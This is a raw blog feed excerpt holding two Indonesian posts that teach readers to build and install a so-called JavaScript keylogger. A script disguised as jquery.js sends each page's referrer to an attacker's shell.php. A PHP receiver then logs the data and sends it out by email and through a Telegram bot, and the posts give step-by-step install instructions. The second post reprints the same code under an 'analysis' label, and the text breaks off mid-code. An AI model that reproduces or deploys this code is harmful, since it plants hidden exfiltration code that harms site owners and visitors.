Script&lt;/a&gt;&amp;nbsp;kali ini saya akan memberikan tutorial cara memasangnya.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Jika belum tahu kalian bisa Baca disini :&amp;nbsp;&lt;a href=&quot;https://www.bandungdigitalsecurity.org/2018/07/malware-attack-using-javascript.html&quot;&gt;Java Script Keylogger&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;langsung saja pertama kita buat file jquery nya terlebih dahulu&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;dengan code :&lt;/span&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot; style=&quot;white-space: pre-wrap; word-wrap: break-word;&quot;&gt;&lt;span style=&quot;color: #38761d; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;var r=document.referrer;if(r != &quot;&quot;){var x = new XMLHttpRequest();x.open(&quot;GET&quot;, &quot;https://labs.suicide-db.com/shell.php?ref=&quot; + r, true);xhttp.send();}&lt;/span&gt;&lt;/blockquote&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;sedikit penjelasan :&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;color: #38761d;&quot;&gt;https://labs.suicide-db.com/shell.php : &lt;/span&gt;ini merupakan web kalian yang berisikan shell yang berisi keylogger.&lt;span style=&quot;color: #38761d;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;jika sudah save dengan format &lt;/span&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;&lt;span style=&quot;color: #38761d;&quot;&gt;.js &lt;/span&gt;jika sudah kalian bisa membuat script ini :&lt;span style=&quot;color: #38761d;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;&lt;span style=&quot;color: #38761d;&quot;&gt;&amp;lt;script type=&quot;text/javascript&quot; src=&quot;https://labs.suicide-db.com/jquery.js&quot;&amp;gt;&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Letakan script ini didalam meta &lt;span style=&quot;color: #38761d;&quot;&gt;&amp;lt;head&amp;gt; &amp;lt;/head&amp;gt;&lt;/span&gt; Contoh : &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;span style=&quot;color: #38761d; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;&amp;lt;head&amp;gt;&lt;/span&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;&amp;lt;script type=&quot;text/javascript&quot; src=&quot;https://labs.suicide-db.com/jquery.js&quot;&amp;gt;&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;&amp;lt;/head&amp;gt;&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;jika sudah kita ke tahap selanjutnya  kita kembali ke step atas di bagian pada link &lt;span style=&quot;color: #38761d;&quot;&gt;https://labs.suicide-db.com/shell.php &lt;/span&gt;nah sekarang kita akan membuat file&lt;span style=&quot;color: #38761d;&quot;&gt; shell.php &lt;/span&gt;ini&lt;span style=&quot;color: #38761d;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;pertama kalian masuk filemanager website kalian dan buat sebuah file shell.php atau bebas disini saya membuat file shell.php&lt;/span&gt;&amp;nbsp;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;jika sudah masukan script berikut :&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;span style=&quot;color: #38761d;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;&amp;lt;?php&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;@date_default_timezone_set(&#39;Asia/Jakarta&#39;);&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;error_reporting(0);&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;error_log(0);&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;if(isset($_GET[&#39;ref&#39;]))&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;{&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;$url = $_GET[&#39;ref&#39;];&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;if(!empty($url)){&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;$sb = &quot;[SHELL][Xenzia Worm][&quot;.date(&#39;D, d M Y H:i:s&#39;).&quot;]&quot;;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;$headers = &quot;From: PROLOGGER &amp;lt;KeyLogger@xenzia.worm&amp;gt;\r\n&quot;;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;$msg = &quot;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;+------------------------------------------+\n&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;# SHELL LOG &quot;.date(&#39;D,d m Y H:i:s&#39;).&quot;\n&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;+------------------------------------------+\n&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;# URL :: &quot;.$url.&quot;\n&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;+------------------------------------------+\n&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;# JavCode @ 2018 | Powered by : shutdown57\n&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;+------------------------------------------+\n&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;&quot;;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;@mail(&quot;postmaster@zaenalarifin.net&quot;,$sb,$msg,$headers);&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;@file_get_contents(&#39;https://api.telegram.org/bot516764791:AAEEnO8F…/sendMessage…);&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;$fp = fopen(&#39;sl/JavCode-&#39;.date(&#39;dmY&#39;).&#39;.txt&#39;,&#39;a&#39;);&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;fwrite($fp,$msg);&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;fclose($fp);&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;exit;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;}else{&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;exit(&#39;?&#39;);&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Oke hal yang harus diperhatikan :&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;&lt;/span&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;@mail(&quot;&lt;span style=&quot;color: #38761d;&quot;&gt;postmaster@zaenalarifin.net&lt;/span&gt;&quot;,$sb,$msg,$headers);   (log dari shell ini akan masuk ke alamat email kalian)&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;@file_get_contents(&#39;&lt;span style=&quot;color: #38761d;&quot;&gt;https://api.telegram.org/bot516764791:AAEEnO8F…/sendMessage…&lt;/span&gt;);&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;(log dari shell akan masuk ke alamat pesan telegram kalian) &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;jika sudah save file nya dan keylogger sudah terbuat&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Oke mudah bukan , mungkin cukup sekian semoga bermanfaat&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Jika masih tidak mengerti kalian bisa hubungi saya di Menu Contact Us&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;(Zaenal Arifin)&lt;/span&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;http://feeds.feedburner.com/bandungdigitalsecurity&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='https://www.bandungdigitalsecurity.org/feeds/4176891508006905585/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.bandungdigitalsecurity.org/2018/07/tutorial-memasang-keylogger-di.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1481717144980864440/posts/default/4176891508006905585'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1481717144980864440/posts/default/4176891508006905585'/><link rel='alternate' type='text/html' href='https://www.bandungdigitalsecurity.org/2018/07/tutorial-memasang-keylogger-di.html' title='Tutorial Memasang Keylogger di JavaScript'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://4.bp.blogspot.com/-1hMZoYvbDRE/W1Qz-BIEMoI/AAAAAAAAAIs/kLkZ0Wq5Qs8aU7VGDDS6B3y1wThQbqrWwCLcBGAs/s72-c/KeyLog.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1481717144980864440.post-2604714755092487689</id><published>2018-07-22T09:36:00.000-07:00</published><updated>2018-08-15T20:27:36.087-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Cyber Attack"/><category scheme="http://www.blogger.com/atom/ns#" term="Cyber Crime"/><category scheme="http://www.blogger.com/atom/ns#" term="Internet"/><category scheme="http://www.blogger.com/atom/ns#" term="Java Script"/><category scheme="http://www.blogger.com/atom/ns#" term="Keylogger"/><category scheme="http://www.blogger.com/atom/ns#" term="Malware"/><category scheme="http://www.blogger.com/atom/ns#" term="Security"/><category scheme="http://www.blogger.com/atom/ns#" term="Shell"/><category scheme="http://www.blogger.com/atom/ns#" term="Technology"/><title type='text'>JavaScript Keylogger</title><content type='html'>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://3.bp.blogspot.com/--9euig-MuWY/W1QrndegqmI/AAAAAAAAAIg/G8BlnnqSOi4AemPpRSbdTaj3E9H4UE13wCEwYBhgL/s1600/javascript.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;720&quot; data-original-width=&quot;1280&quot; height=&quot;360&quot; src=&quot;https://3.bp.blogspot.com/--9euig-MuWY/W1QrndegqmI/AAAAAAAAAIg/G8BlnnqSOi4AemPpRSbdTaj3E9H4UE13wCEwYBhgL/s640/javascript.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;Oke Kembali lagi bersama saya kali ini saya akan share tutorial membuat/membongkar key logger di Java Script tepatnya di Jquery buatan Shutdown57 dari JavaCode.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Pada umumnya keylogger dibuat dalam bentuk code PHP namun teknik tersebut sudah diketahui banyak orang dan memunculkan sebuah inspirasi baru dari Shutdown57 untuk tetap menjalankan Keylogger tanpa diketahui yaitu menggunakan ref dari Jquery&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Kok bisa dari script jquery ?&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;yaps disini kita memfungsikan request ajax yang ambil referrer dari shell.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Berikut Code Singkat Jquery nya :&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;span style=&quot;color: #38761d; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;var xhttp = new XMLHttpRequest();xhttp.open(&quot;GET&quot;, &quot;http://x.linuxcode.org/_.php?ref=&quot; + document.referrer, true);xhttp.send();&lt;/span&gt;&lt;/blockquote&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Yaps disini kita bisa melihat request dari referrer menuju sebuah link yaitu&amp;nbsp;&lt;span style=&quot;color: #38761d;&quot;&gt;http://x.linuxcode.org/_.php&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;color: #38761d;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;nah disinilah letak keylogger nya , dalam intinya keylogger ini sama menggunakan code php namun disini author membuat agar tidak diketahui orang melainkan melalui request referrer dari link lain menggunakan fungsi request dari jquery yang akan diarahkan menuju&amp;nbsp;&lt;span style=&quot;color: #38761d;&quot;&gt;http:/x.linuxcode.org/_.php&amp;nbsp;&lt;/span&gt;agar tidak dapat diketahui orang dan orang akan mengira file jquery ini merupakan fungsi yang seperti biasanya dalam arti (bukan sebuah file berbahaya/hanya untuk memfungsikan style dalam web itu sendiri)&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;color: #38761d;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Oke tahap selanjut nya , apa isi dari&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;color: #38761d;&quot;&gt;http:/x.linuxcode.org/_.php&lt;/span&gt;&amp;nbsp;?&lt;br /&gt;&lt;br /&gt;yaps jika kita buka maka link tersebut blank atau tidak ada isinya mengapa ? karena ini hanya berisikan code php keylogger tanpa ulasan sedikitpun , oke lalu isi code nya apa ?&lt;br /&gt;&lt;br /&gt;Isi dalam file&amp;nbsp;&lt;span style=&quot;color: #38761d;&quot;&gt;_.php&lt;/span&gt;&amp;nbsp;itu code php keylogger&lt;br /&gt;&lt;br /&gt;berikut Code nya seperti ini :&lt;/span&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&amp;lt;?php&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;@date_default_timezone_set(&#39;Asia/Jakarta&#39;);&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;error_reporting(0);&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;error_log(0);&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;if(isset($_GET[&#39;ref&#39;]))&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;{&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;$url = $_GET[&#39;ref&#39;];&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;if(!empty($url)){&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;$sb = &quot;[SHELL][shutdown57][&quot;.date(&#39;D, d M Y H:i:s&#39;).&quot;]&quot;;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;$headers = &quot;From: PROLOGGER &amp;lt;LoggerShell@shutdown57.today&amp;gt;\r\n&quot;;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;$msg = &quot;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;+------------------------------------------+\n&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;# SHELL LOG &quot;.date(&#39;D,d m Y H:i:s&#39;).&quot;\n&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;+------------------------------------------+\n&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;# URL :: &quot;.$url.&quot;\n&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;+------------------------------------------+\n&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;# JavCode @ 2018 | Powered by : shutdown57\n&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;+------------------------------------------+\n&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&quot;;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , 